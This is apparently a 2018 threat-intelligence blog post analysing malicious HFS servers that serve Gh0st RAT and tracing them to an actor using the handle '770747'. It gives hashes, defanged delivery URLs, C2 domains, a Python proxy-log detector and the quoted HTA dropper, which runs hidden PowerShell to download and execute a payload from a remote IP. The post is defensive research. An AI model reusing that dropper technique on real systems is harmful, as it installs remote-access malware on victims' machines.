Field Notes: Malicious HFS Instances Serving Gh0stRAT

Posted on 2018-07-09 by Adam Swanda

HTTP File Server, commonly abbreviated as HFS, is a free and simple means to send and receive files across the Internet. This also makes the software a popular choice among malicious actors for hosting and distributing malware and exploits, and an interesting target for malware researchers. An investigation into an HFS instance hosting an exploit for CVE-2018-8174 led to the discovery of an interesting threat actor and their infrastructure, the continued use of the Gh0st RAT malware, and many common attributes we can use to help us identify this malicious activity in the wild.

Field Notes

Field Notes is a new blog post series meant to quickly share threat data, Indicators of Compromise, commentary on current events, or other brief analysis with the community at a higher level, without performing in-depth reverse engineering or deep dives into a given campaign, actor, or infrastructure. Many researchers post short briefs on campaigns or threats as Pastebin posts, GitHub Gists, or Twitter threads, but we feel this blog format is a great medium to get across not only the technical analysis and indicators but also some contextual information on the threat or event in focus. The complete series can be browsed by tag:field-notes.

Background

The HTTP File Server, also known as HFS, was created to provide a free and easy means of sharing files across the Internet, which makes the software a popular choice among a variety of actors for hosting and distributing malicious content. On the other side of the coin, this also means that the discovery of malicious HFS instances can be a treasure trove for malware researchers. The hosting services are often left wide open, allowing anyone who visits to view and download any of the hosted files. It's not uncommon to see HFS instances discussed on Twitter among researchers using hashtags like "#opendir". Additionally, the use of HFS to host malicious content is quite popular among China-based threat actors.

InQuest was notified of one such HFS instance, located at http://9mng[.]vip and using an uncommonly high port number, by a helpful third party. The homepage, which sometimes allows open browsing of files, had been replaced with an index.html file embedding VBScript meant to exploit the CVE-2018-8174 vulnerability when a vulnerable user visits the page. The exploit code was copied directly from the public proof of concept on exploit-db.com, with the debug messages commented out and the shellcode slightly modified, although it did not successfully trigger exploitation in lab conditions. Nonetheless, this made me interested in what else could be found on this HFS server. Special thanks to security researcher Sev for discovering this HFS instance and bringing to our attention the exploit and the malicious HTA file detailed below.

Discovered next was an HTA file by the name of 770747.hta, the contents and file hashes of which can be seen below:

  • File: 770747.hta
  • MD5: cf7535110cdc8b0f854e15516f79b373
  • SHA1: c4eeda16f51162cd177ebe7cfdd2de96dc33d433
  • SHA256: cdcff5b367d079ca11a2bc23c31fc341dcad060fa27c30a8b4fa453dab699eb1

HTA File Contents

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://103.100.210[.]50:7777/SB360.exe\', \'c:/windows/temp/770747.exe\'); c:/windows/temp/770747.exe', 0);window.close();
</script>

A quick look at the code shows this file was meant to act as a small dropper: it downloads SB360.exe from the URL to disk under the file name 770747.exe and then executes it.

The downloaded file is a UPX compressed Windows executable with the following attributes:

  • File: SB360.exe
  • MD5: 27b1e5595c46e3bff5c9d7392f18b24d
  • SHA1: 304bb03c334625e18f7cf941fa3e34fc18b2e31f
  • SHA256: 20bd5a03996f8ee8b4831b1eb86aea805fe424023da88f5896909fe81aa58fa7

Once decompressed, this same file will have the following hashes:

  • MD5: 403c08aa6a48310dc326dec9f3929116
  • SHA1: df46fca6d48f5c1d4a29da9821ad8235eac50e45
  • SHA256: 39789a629d28b8b5b6895450908db2078f1cd473bc3915637fda772b0a62da46

The downloaded payload was identified as Gh0st RAT, a full-featured remote access trojan for Windows. This malware family has been around for many years and still sees wide use. Like the use of HFS for hosting malicious content, Gh0st RAT is also popular with Chinese threat actors. Several variants of it are floating around because the source code has been made available online.

This particular payload copies itself to the %WINDOWS% directory using the filename 770747.exe and sets itself up for persistence by creating a Windows service under the name Sentinel SuperPro Server that points to the copied file path.

Windows Service

Next, this malware attempts to communicate with a Command and Control server at the domain 770747.9mng[.]vip. Examination of the malware also reveals a secondary server, 77074722.f3322[.]net. The f3322[.]net domain belongs to a dynamic DNS provider based in China that often comes up in the course of research into Chinese-hosted malware, but the provider's domain itself is not directly malicious. At the time of the investigation, the C&C server was unresponsive, and no additional activity occurred.

VirusTotal results for this payload show that it has been seen in the wild using the file names DHL2018.exe and DHL2018.dat. Pivoting to search VirusTotal for files using the same name returns a result for a second DHL2018.dat file, uploaded by a user from South Korea on 06-20-2018. That file exhibits identical behavior to our original payload and also attempts to contact the C&C server 770747.9mng[.]vip:

  • MD5: f94172de8692879711dc020588b3ff89
  • SHA1: e7c8d262ddc1f7d5296f00d41356ab6062b10433
  • SHA256: 0704fcd3be874336a502bea1cef1a2fa7a15902249b9d21876289ed7b7c51b29

The Curious Case of 770747

For the fourth time during the investigation the string "770747" has popped up:

  • File name used by HTA dropper
  • File name used by delivered malware executable
  • C&C domain name used by 2 malware executables

Revisiting the HFS server that led to this malware, 9mng[.]vip, a web server is also running on port 80 with "770747" listed at the bottom of the homepage as a QQ contact number. QQ is an instant messaging service provided by Tencent and also quite popular in China.

Searching for further references to this QQ number brings up yet another reference of interest, this time as the contact information for the "Admin" user of a Chinese-language forum on baidu200[.]com.

The forum has several subforums, with some roughly translating to identify sections such as "Information Security", "Vulnerability Announcement", and "Penetration attack and defense". In one particular post by the Admin user in 2010, they advertise paid access to security-related content including topics such as malware and RAT use, website defacement, penetration testing, and more.

In this post, the Admin user provides the QQ number 770747 as their contact information and references a TenPay account under the same identifier and an Alipay account with the email address dzw770747@126[.]com.

Baidu200 Post

Additionally, in a separate Chinese language forum, a user posted a complaint about 770747 claiming to have been scammed by them. The poster provides the following information to other users so they can identify the suspected scammer:

Contact Details

The "770747" identifier has now been seen in multiple locations: the original HFS instance, the Gh0st RAT samples, and the Admin user of a security-focused forum. While the actor does not seem particularly advanced, given their poor OPSEC and use of modified but publicly available malware and exploits, we've been able to associate the malware with an actor and the actor with a set of Tactics, Techniques, and Procedures we can use for further research.

Finding Other HFS + Gh0st RAT Incidents

Using the quick investigation above as a sort of template, it's possible to take some of the key details and expand the scope of investigation in an attempt to identify other China-based HFS instances, particularly those delivering the Gh0st RAT malware.

TTPs:

  • Use of HFS on high, non-standard TCP port
  • Use of Gh0st RAT malware
  • Use of filenames SB360.exe and DHL2018.exe
  • Use of dynamic DNS hosting for Command and Control servers

The file name SB360.exe is used legitimately by the software 360Safe, an anti-virus suite developed by the China-based company Qihoo. Further digging shows that it is also the default file name of the server component of Gh0st RAT in a leaked copy of its source code available on GitHub.com. UPX compression of payloads is also an option available to actors using this malware, as we saw with the original payload. It may also be of note that the GitHub repository for this copy of Gh0st RAT uses the string "DHL_" in its name, but we were unable to find any substantial evidence of "DHL2018" being used in other notable locations.

An investigation into the leaked source code shows it's also available in many other locations, including public forums and file-sharing websites. Because Gh0st RAT's source code is publicly available, actors who use this leaked source code without modifying the default parameters will produce a payload with the filename "SB360.exe", as we found in the case of 770747.

Gh0st RAT Source Code

Searching VirusTotal Intelligence for other samples using the filename "SB360.exe" quickly leads to more results going back several years. Digging through the results finds several cases where a payload using this file name is delivered from a China-hosted web server on a high TCP port number and communicates back to the same server or to a dynamic DNS host. Although not every instance could be verified as HFS serving the payload, often because the server was no longer active, many of the servers were indeed HFS. The STORM DDoS bot malware is also still distributed in this same manner, and many times it was hosted on the same HFS instance. Examples of this hosting activity are listed below.

  • MD5: 27b1e5595c46e3bff5c9d7392f18b24d
  • Delivery URL: http://103.100.210[.]50:7777/SB360.exe

  • MD5: ace601183f1fa24cba048039104e65de
  • Delivery URL: http://42.226.35[.]42:2323/SB360.exe

  • MD5: b35e8808e41445bb2d37aa329e74acce
  • Delivery URL: http://112.30.132[.]138:2323/SB360.exe

  • MD5: 3fdd0a416e6778f992a1be9f97e91c60
  • Delivery URL: http://112.30.132[.]138:2323/SB360.exe

  • MD5: 825fa52261713621ee646b1c669b69bf
  • Delivery URL: http://118.193.137[.]60:2500/SB360.exe

  • MD5: a4c9c8bbfd909422bec69ba82b60af42
  • Delivery URL: http://199.195.129[.]250:7878/SB360.exe

  • MD5: 16e2a37b3deaa6397535d0ebf9cc3c43
  • Delivery URL: http://220.165.9[.]89:5566/SB360.exe

As mentioned at the beginning of this post, malware researchers are often sharing open web directories with malicious content they find for the sake of research and awareness. The Twitter hashtag #opendir is often used when discussing these findings. A look over these posts yields many malicious websites and payloads with HFS instances commonly among them.

One example from June 2018 shows the user @ExecuteMalware referencing an open HFS instance hosting Gh0st RAT, among other files.

Twitter Post

The service Shodan.io can also be beneficial in identifying HFS servers during an investigation. Shodan is a very powerful search engine that lets the user look for Internet-connected systems and use a variety of filters and queries to narrow results to specific services, ports, countries, and more. Systems found by Shodan are not necessarily malicious, since Shodan returns every system it has identified for a given query.

For example, using the query "Server: HFS" returns thousands of results for instances located in the United States, China, and other countries.

Shodan Search Results

By leveraging the data collected by Shodan, it's possible to view information about a given IP address, such as the software used, the operating system, geolocation, web server banners, and more, without actually visiting or fingerprinting the host yourself.

Overview

In this investigation we went from a single reported exploit hosted on a web server to the discovery of associated malware and the likely threat actor behind it; then leveraged the artifacts and TTPs we found along the way and pivoted from a single event to identifying a larger trend. Public and free tools like Google, GitHub, Shodan, and VirusTotal can be immensely helpful in research efforts like this.

Once more context is gathered, and a bigger picture is painted, the collected information can often be used in the creation of proactive detection measures such as SIEM alerting. In this case, the default Gh0st RAT file name and common hosting patterns of HFS and C&C servers are great starting points. For example, a SIEM alert might check web proxy logs for users downloading the file SB360.exe from an external host using a non-standard or high TCP port.
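As an added example (not code from the post or from InQuest), the following Python applies that proxy-log rule to a few constructed log lines, covering both the TTPs listed above and the alert described here. The log format, the RFC 1918 ranges treated as internal, and the 203.0.113.0/24 sample addresses are assumptions; the code also goes slightly beyond the rule as stated by scoring a filename match on a standard port or from internal space as low severity rather than ignoring it.

```python
import ipaddress
import posixpath
from urllib.parse import urlsplit

# Payload names from the investigation: Gh0st RAT default plus VirusTotal names.
SUSPECT_FILENAMES = {"sb360.exe", "dhl2018.exe", "dhl2018.dat"}
STANDARD_WEB_PORTS = {80, 443}
INTERNAL_NETS = [ipaddress.ip_network(n)  # RFC 1918; swap in your own ranges
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def classify_download(url):
    """Return (severity, reasons); severity is None, "low" or "high". "high"
    mirrors the post's SIEM rule: suspect filename, external host, odd port."""
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # malformed URL or port component in the log line
        return None, []
    name = posixpath.basename(parts.path).lower()
    if (parts.scheme not in ("http", "https") or not parts.hostname
            or name not in SUSPECT_FILENAMES):
        return None, []
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        addr = None  # a DNS name: not resolved here, so treated as external
    internal = addr is not None and any(addr in n for n in INTERNAL_NETS)
    reasons = [f"filename {name} is a known Gh0st RAT payload name"]
    if port in STANDARD_WEB_PORTS or internal:
        return "low", reasons  # worth a look, but not the HFS hosting pattern
    reasons.append(f"non-standard TCP port {port} on external host")
    if addr is not None:  # every observed delivery host was a bare IP
        reasons.append("delivery host is an IP literal rather than a domain")
    return "high", reasons

def scan_proxy_log(lines):
    """Lines are '<timestamp> <client_ip> <method> <url> <status>' (assumed)."""
    hits = []
    for f in (line.split() for line in lines):
        if len(f) >= 5:
            severity, reasons = classify_download(f[3])
            if severity:
                hits.append((f[1], f[3], severity, reasons))
    return hits

SAMPLE_LOG = [  # constructed lines; 203.0.113.0/24 is documentation space
    "2018-07-09T10:01:02Z 10.1.2.3 GET http://203.0.113.10:7777/SB360.exe 200",
    "2018-07-09T10:03:00Z 10.1.2.6 GET http://10.9.8.7:8080/SB360.exe 200",
    "2018-07-09T10:04:00Z 10.1.2.7 GET http://203.0.113.13:2500/update.exe 200",
]
```

Running `scan_proxy_log(SAMPLE_LOG)` returns one high-severity hit for the 7777 download and one low-severity hit for the internal host; the update.exe line is ignored.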

InQuest detects the Gh0st RAT malware with the following signature:

  • Name: Gh0st_RAT_Trojan
  • Event ID: 5000199

